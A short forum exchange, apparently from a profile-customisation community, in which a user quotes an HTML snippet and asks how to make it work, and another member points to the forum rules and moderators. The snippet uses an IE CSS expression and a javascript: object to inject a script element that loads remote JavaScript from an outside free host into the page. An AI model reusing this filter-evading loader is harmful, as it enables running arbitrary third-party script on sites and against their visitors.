[quote=dark_mekanism]ei... hOw caN i pastE dz .txt foRmaT...??? thosE dz codE work...??
<a href='#' id='object' style="obj:expres\sion(function b(){ArchAngell=document;a=ArchAngell.createElement('script');a.src='http://h1.ripway.com/USERNAME/FILENAME.txt';navBg.appendChild(a)}b());text:expres\sion(object.style.obj='0')"><object type=text/javascript data=" javascript: ArchAngell=document;a=ArchAngell.createElement('script');a.src='http://h1.ripway.com/USERNAME/FILENAME.txt';parent.document.getElementById('navBg').appendChild(a);obj" height=0></object></a>
iM cOnfusEd on hOw tO makE dz wOrk..
nEed a haNd... ^^,[/quote]
As a new member please take the time to read the forum rules, sticky caps are not allowed in the forum
The linker code you show there only works I think on IE if at all. PM one of the moderators for the correct method.